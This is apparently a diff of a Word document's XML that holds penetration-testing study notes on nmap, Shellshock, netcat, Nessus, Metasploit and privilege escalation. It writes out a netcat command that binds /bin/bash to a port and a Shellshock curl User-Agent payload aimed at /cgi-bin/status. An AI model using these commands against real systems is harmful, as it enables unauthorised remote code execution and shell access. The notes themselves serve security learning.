+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>( https://nmap.org</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> ) at 2022-02-05 11:46 IST</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1892,7 +2139,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> open  http-proxy</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>open  http</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>-proxy</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -1905,6 +2160,9 @@
       <w:r>
         <w:t>``````````````````````````</w:t>
       </w:r>
+      <w:r>
+        <w:t>`````````````````````````````````````````````````````````````</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -1946,37 +2204,81 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>--reason [ reason of port/service state ]</w:t>
-      </w:r>
+        <w:t xml:space="preserve">--reason [ reason of port/service </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>state ]</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:r>
         <w:t>``````````````````````````</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
+      <w:r>
+        <w:t>`````````````````````````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t># cd /</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>usr</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>/share/</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>nmap</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>/</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t># ls</w:t>
       </w:r>
     </w:p>
@@ -1988,7 +2290,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>-mac-prefixes : Contain MAC prefix to detect manufacturer</w:t>
+        <w:t>-mac-</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>prefixes :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Contain MAC prefix to detect manufacturer</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2000,9 +2310,14 @@
       <w:r>
         <w:t>-protocols</w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:tab/>
-        <w:t xml:space="preserve">  : Contain protocol and port related info</w:t>
+        <w:t xml:space="preserve">  :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Contain protocol and port related info</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -2015,6 +2330,9 @@
       <w:r>
         <w:t>`````````````````````````````````````````</w:t>
       </w:r>
+      <w:r>
+        <w:t>```````````````</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2075,18 +2393,23 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:t xml:space="preserve">2) SYN Scan: [ Half Open </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Scan ]</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>-------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>2) SYN Scan: [ Half Open Scan ]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>-------------------------------</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
         <w:t>Attacker ---------SYN:8080-------&gt; Target</w:t>
       </w:r>
     </w:p>
@@ -2168,6 +2491,9 @@
       <w:r>
         <w:t>`````````````````````````````````````````</w:t>
       </w:r>
+      <w:r>
+        <w:t>````````````````</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -2402,34 +2728,45 @@
       <w:r>
         <w:t>``````````````````</w:t>
       </w:r>
+      <w:r>
+        <w:t>`````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>vulnerability: SHELLSHOCK</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Google:  2014 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Type: RCE [ Remote Code </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Execution ]</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Remote</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>vulnerability: SHELLSHOCK</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Google:  2014 </w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>Type: RCE [ Remote Code Execution ] Remote</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
         <w:t>/</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>cgi</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t>-bin/status</w:t>
       </w:r>
@@ -2662,102 +2999,102 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:t>Terminal 1:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -n -v -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>lp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 5555 -e /bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Terminal 2:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 127.0.0.1 5555</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Terminal 1:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -n -v -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>lp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 5555 -e /bin/bash</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Terminal 2:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nv</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 127.0.0.1 5555</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
         <w:t>for example:</w:t>
       </w:r>
     </w:p>
@@ -2777,13 +3114,18 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">we took access through vulnerable web and start listening  </w:t>
+        <w:t xml:space="preserve">we took access through vulnerable web and start </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t xml:space="preserve">listening  </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>netcat</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t xml:space="preserve"> on </w:t>
       </w:r>
@@ -2808,7 +3150,23 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>curl -A '() { :; }; echo; /bin/bash -c "</w:t>
+        <w:t xml:space="preserve">curl -A '() </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>{ :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>; }; echo; /bin/bash -c "</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -2864,8 +3222,13 @@
         <w:t>nd</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> terminal :</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>terminal :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2927,14 +3290,41 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>NESSUS:</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>```````</w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>`````</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -2994,162 +3384,162 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
+        <w:t>https://www.tenable.com/downloads</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Nessus-----------.deb</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">$ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>dpkg</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Nessus----------.deb</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">$ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>systemctl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> status </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Nessus.service</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">$ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>systemctl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> start </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Nessus.service</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>https://www.tenable.com/downloads</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Nessus-----------.deb</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">$ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>dpkg</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>i</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Nessus----------.deb</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">$ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>systemctl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> status </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Nessus.service</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">$ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>systemctl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> start </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Nessus.service</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
         <w:t xml:space="preserve">Access the Interface: Once the service is running, access the web-based GUI in your browser at </w:t>
       </w:r>
       <w:r>
@@ -3233,7 +3623,15 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>2. Main Components::Modules</w:t>
+        <w:t xml:space="preserve">2. Main </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Components::</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>Modules</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3273,25 +3671,33 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:t xml:space="preserve"> Auxiliary: Any supporting module, such as scanners, crawlers and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>fuzzers</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, can be found here.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> Encoders: Encoders will allow you to encode the exploit and payload in the hope that a signature-based antivirus solution may miss them. Signature-based antivirus and security solutions have a database of known threats. They detect threats by comparing suspicious files to this database and raise an alert if there is a match. </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Thus</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> encoders can have a limited success rate as antivirus solutions can perform additional checks.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve"> Auxiliary: Any supporting module, such as scanners, crawlers and </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>fuzzers</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>, can be found here.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve"> Encoders: Encoders will allow you to encode the exploit and payload in the hope that a signature-based antivirus solution may miss them. Signature-based antivirus and security solutions have a database of known threats. They detect threats by comparing suspicious files to this database and raise an alert if there is a match. Thus encoders can have a limited success rate as antivirus solutions can perform additional checks.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
         <w:t xml:space="preserve"> Evasion: While encoders will encode the payload, they should not be considered a direct attempt to evade antivirus software. </w:t>
       </w:r>
       <w:r>
@@ -3518,8 +3924,42 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:t>The module to be used can be selected with the use command followed by the number at the beginning of the search result line.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> &gt; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>show</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The prompt tells us we now have a context set in which we will work. You can see this by typing the show options command.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> &gt; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>back</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>The module to be used can be selected with the use command followed by the number at the beginning of the search result line.</w:t>
+        <w:t>You can leave the context using the back command.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3531,40 +3971,6 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>show</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>The prompt tells us we now have a context set in which we will work. You can see this by typing the show options command.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve"> &gt; </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>back</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>You can leave the context using the back command.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve"> &gt; </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
         <w:t>search</w:t>
       </w:r>
     </w:p>
@@ -3656,65 +4062,71 @@
         <w:t>--------------------------------------------------------------------------------------------------------------------------</w:t>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Privilege Escalation:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>``````````````````````</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>```````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The goal is to increase the level of access on a system. There are a wide range of privilege escalation techniques.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Techniques Used for Privilege Escalation:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>- Kernel Exploits</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>- Exploiting Services Which are Running as Root</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>- Exploiting SUID Executables</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>Privilege Escalation:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>``````````````````````</w:t>
-      </w:r>
-      <w:r>
-        <w:t>```````</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>The goal is to increase the level of access on a system. There are a wide range of privilege escalation techniques.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Techniques Used for Privilege Escalation:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>- Kernel Exploits</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>- Exploiting Services Which are Running as Root</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>- Exploiting SUID Executables</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
         <w:t>- Exploiting SUDO Rights</w:t>
       </w:r>
     </w:p>
@@ -3777,18 +4189,40 @@
     </w:p>
     <w:p/>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>sudo</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t xml:space="preserve"> -l</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve"># Example output:# User </w:t>
+        <w:t xml:space="preserve"># Example </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>output:#</w:t>
+      </w:r>
